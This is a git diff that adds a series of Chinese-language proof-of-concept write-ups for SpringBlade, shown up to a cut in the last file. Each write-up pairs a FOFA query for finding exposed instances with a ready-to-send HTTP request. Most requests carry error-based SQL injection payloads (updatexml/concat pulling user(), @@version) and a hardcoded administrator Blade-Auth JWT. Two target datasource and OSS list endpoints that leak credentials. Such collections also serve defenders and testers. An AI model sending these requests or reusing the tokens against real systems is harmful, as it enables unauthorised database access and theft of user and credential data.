index 0000000..5fe928e
--- /dev/null
+++ b/SpringBlade-export-user-SQL-注入漏洞.md
@@ -0,0 +1,16 @@
+## SpringBlade export-user SQL 注入漏洞
+
+SpringBlade 是一个由商业级项目升级优化而来的SpringCloud分布式微服务架构、SpringBoot单体式微服务架构并存的综合型项目，采用Java8 API重构了业务代码，完全遵循阿里巴巴编码规范。采用Spring Boot 2.7 、Spring Cloud 2021 、Mybatis 等核心技术，同时提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。在github上有6.3K Star。该系统/api/blade-user/export-user接口存在SQL注入漏洞，会造成数据泄露。
+
+## fofa
+```
+body="https://bladex.vip"
+```
+
+## poc
+```
+http://192.168.40.130.90/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
+
+```
+![8606bf72e1e31edb69ca633e2b0a9ecd](https://github.com/wy876/POC/assets/139549762/a0d23d76-6588-4dfd-ad0e-b81aef36c062)
+
diff --git a/SpringBladeapi-list存在SQL注入漏洞.md b/SpringBladeapi-list存在SQL注入漏洞.md
new file mode 100644
index 0000000..b4ba4a4
--- /dev/null
+++ b/SpringBladeapi-list存在SQL注入漏洞.md
@@ -0,0 +1,31 @@
+# SpringBlade api-list存在SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade api-list存在SQL注入漏洞，攻击者利用该漏洞进行SQL注 入攻击
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/wySOnzT0xKrb1lCv/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-230326.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-log/api/list?updatexml(1,concat(0x7e,111*111,0x7e),1)=1 HTTP/1.1
+Host: 
+Blade-Auth:	eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+```
+
+![1716303401430-b9efceb6-bca4-420d-81f8-f8ecd3220f3c.png](./img/wySOnzT0xKrb1lCv/1716303401430-b9efceb6-bca4-420d-81f8-f8ecd3220f3c-181020.png)
+
+```java
+12321
+```
+
+
+
+> 更新: 2024-12-13 17:10:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bxhqc6lec9obt7lg>
\ No newline at end of file
diff --git a/SpringBladeblade-user-list存在SQL注入漏洞.md b/SpringBladeblade-user-list存在SQL注入漏洞.md
new file mode 100644
index 0000000..b54cb64
--- /dev/null
+++ b/SpringBladeblade-user-list存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# SpringBlade blade-user-list存在SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade blade-user-list存在SQL注入漏洞，攻击者利用该漏洞进行SQL注入攻击
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/8MClMtc2cjguyKwm/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-142126.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-user/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Connection: close
+```
+
+![1722875134506-fcf1c67f-b543-432a-a29e-c201fe69a5c7.png](./img/8MClMtc2cjguyKwm/1722875134506-fcf1c67f-b543-432a-a29e-c201fe69a5c7-686300.png)
+
+
+
+> 更新: 2024-12-13 17:10:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kxqvvhhxlie10nii>
\ No newline at end of file
diff --git a/SpringBladecode-list存在SQL注入漏洞.md b/SpringBladecode-list存在SQL注入漏洞.md
new file mode 100644
index 0000000..13115b7
--- /dev/null
+++ b/SpringBladecode-list存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# SpringBlade code-list存在SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade code-list存在SQL注入漏洞，攻击者利用该漏洞进行SQL注入攻击
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/kV2dyz_loYZ3KDlR/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-643561.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-develop/code/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Connection: close
+```
+
+![1722875023704-551a90ac-0d8c-4c2f-b964-32442906adf0.png](./img/kV2dyz_loYZ3KDlR/1722875023704-551a90ac-0d8c-4c2f-b964-32442906adf0-601991.png)
+
+
+
+> 更新: 2024-12-13 17:10:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rai84tybgfc4flks>
\ No newline at end of file
diff --git a/SpringBladedatasource-list存在敏感信息泄露.md b/SpringBladedatasource-list存在敏感信息泄露.md
new file mode 100644
index 0000000..a97d123
--- /dev/null
+++ b/SpringBladedatasource-list存在敏感信息泄露.md
@@ -0,0 +1,28 @@
+# SpringBlade datasource-list存在敏感信息泄露
+
+# 一、漏洞简介
+SpringBlade datasource-list存在敏感信息泄露漏洞
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/AjeJd3ytEL9HrhNQ/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-859792.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-develop/datasource/list HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Connection: close
+```
+
+![1722874818816-5a6dee23-66b6-4249-ab50-92a2f14977c4.png](./img/AjeJd3ytEL9HrhNQ/1722874818816-5a6dee23-66b6-4249-ab50-92a2f14977c4-850077.png)
+
+
+
+> 更新: 2024-12-13 17:10:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fyrvvqbbnir53nqg>
\ No newline at end of file
diff --git a/SpringBladedict-biz-list存在SQL注入漏洞.md b/SpringBladedict-biz-list存在SQL注入漏洞.md
new file mode 100644
index 0000000..145d4b0
--- /dev/null
+++ b/SpringBladedict-biz-list存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# SpringBlade dict-biz-list存在SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade dict-biz-list存在SQL注入漏洞，攻击者利用该漏洞进行SQL注入攻击
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/zP2uHUDH9siaTuRD/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-391449.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Connection: close
+```
+
+![1722874895220-4024b228-5758-48fa-816a-9afa12566780.png](./img/zP2uHUDH9siaTuRD/1722874895220-4024b228-5758-48fa-816a-9afa12566780-645241.png)
+
+
+
+> 更新: 2024-12-13 17:10:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/saek9akpfy591lcv>
\ No newline at end of file
diff --git a/SpringBladedict-biz存在SQL注入漏洞.md b/SpringBladedict-biz存在SQL注入漏洞.md
new file mode 100644
index 0000000..76c328c
--- /dev/null
+++ b/SpringBladedict-biz存在SQL注入漏洞.md
@@ -0,0 +1,39 @@
+# SpringBlade dict-biz存在SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade dict-biz存在SQL注入漏洞，攻击者利用该漏洞进行SQL注 入攻击
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/eKNle2a8FR_4cOKY/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-322685.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),user(),0x7e),1)=1 HTTP/1.1
+Host: 
+Blade-Auth:	eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+```
+
+![1713236352998-9826b36e-1662-4854-b88f-d07dc13498d5.png](./img/eKNle2a8FR_4cOKY/1713236352998-9826b36e-1662-4854-b88f-d07dc13498d5-184725.png)
+
+```java
+c4ca4238a0b923820dcc509a6f75849
+```
+
+sqlmap
+
+```java
+
+```
+
+
+
+> 更新: 2024-12-13 17:10:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wpz38hmzaeugpctm>
\ No newline at end of file
diff --git a/SpringBladeerror_list存在SQL注入漏洞.md b/SpringBladeerror_list存在SQL注入漏洞.md
new file mode 100644
index 0000000..bf05dba
--- /dev/null
+++ b/SpringBladeerror_list存在SQL注入漏洞.md
@@ -0,0 +1,31 @@
+# SpringBlade error/list 存在SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade  /api/blade-log/error/list路径存在安全漏洞，攻击者利用该漏洞进行SQL注 入攻击
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/BZdErnm7v21TUqLj/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-817083.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-log/error/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept: */*
+Connection: Keep-Alive
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![1710407897035-51869d8b-325a-46cf-84c9-d54a254547cf.png](./img/BZdErnm7v21TUqLj/1710407897035-51869d8b-325a-46cf-84c9-d54a254547cf-741901.png)
+
+
+
+> 更新: 2024-12-13 17:10:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zrkt4t6xd5xn3yek>
\ No newline at end of file
diff --git a/SpringBladeexport-user存在SQL注入漏洞.md b/SpringBladeexport-user存在SQL注入漏洞.md
new file mode 100644
index 0000000..86f4ed8
--- /dev/null
+++ b/SpringBladeexport-user存在SQL注入漏洞.md
@@ -0,0 +1,32 @@
+# SpringBlade export-user 存在 SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞，攻击者利用该漏洞可通过组件customSqlSegment 进行SQL注 入攻击，攻击者可将用户名、密码等敏感信息通过 excel 导出。
+
+# 二、影响版本
++ SpringBlade v3.2.0
+
+# 三、资产测绘
++ fofa`body="[https://bladex.vip"](https://bladex.vip") && title!="融媒体中心后台管理系统" && title!="尚牛电竞运营后台"`
++ 特征
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/_NYAM1MaHtnpei3i/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-917073.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&1-updatexml(1,concat(0x7e,(select+@@version),0x7e),1)=1 HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1703260289968-ee5e0878-4c51-4107-a3a4-f5f6fe02e2f3.png](./img/_NYAM1MaHtnpei3i/1703260289968-ee5e0878-4c51-4107-a3a4-f5f6fe02e2f3-416322.png)
+
+
+
+> 更新: 2024-12-13 17:10:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xgx1k1ortg8i6rp0>
\ No newline at end of file
diff --git a/SpringBlademenu_list存在SQL注入漏洞.md b/SpringBlademenu_list存在SQL注入漏洞.md
new file mode 100644
index 0000000..2917e0c
--- /dev/null
+++ b/SpringBlademenu_list存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# SpringBlade menu/list存在SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade menu/list存在SQL注入漏洞，攻击者利用该漏洞进行SQL注 入攻击
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/NmezmB28oxn8h0Aq/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-536775.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Connection: close
+```
+
+![1722875246289-eb2f34cb-92d8-49de-a81b-3479b1c8353a.png](./img/NmezmB28oxn8h0Aq/1722875246289-eb2f34cb-92d8-49de-a81b-3479b1c8353a-514494.png)
+
+
+
+> 更新: 2024-12-13 17:10:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xz7mg8lxlbnt5kp0>
\ No newline at end of file
diff --git a/SpringBladenotice-list存在SQL注入漏洞.md b/SpringBladenotice-list存在SQL注入漏洞.md
new file mode 100644
index 0000000..80b3bef
--- /dev/null
+++ b/SpringBladenotice-list存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# SpringBlade notice-list存在SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade notice-list存在SQL注入漏洞，攻击者利用该漏洞进行SQL注 入攻击
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/a9mL4-osLnPli5pE/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-628650.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Connection: close
+```
+
+![1722873935072-a9fe204f-3359-4915-9391-43c010302e49.png](./img/a9mL4-osLnPli5pE/1722873935072-a9fe204f-3359-4915-9391-43c010302e49-809108.png)
+
+
+
+> 更新: 2024-12-13 17:10:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/idn8r1ruwfgzvw80>
\ No newline at end of file
diff --git a/SpringBladeoss-list存在敏感信息泄露.md b/SpringBladeoss-list存在敏感信息泄露.md
new file mode 100644
index 0000000..0b7baa4
--- /dev/null
+++ b/SpringBladeoss-list存在敏感信息泄露.md
@@ -0,0 +1,28 @@
+# SpringBlade oss-list存在敏感信息泄露
+
+# 一、漏洞简介
+SpringBlade oss-list存在敏感信息泄露漏洞
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/0xN12jNa7AiTLwb2/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-932459.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-resource/oss/list HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
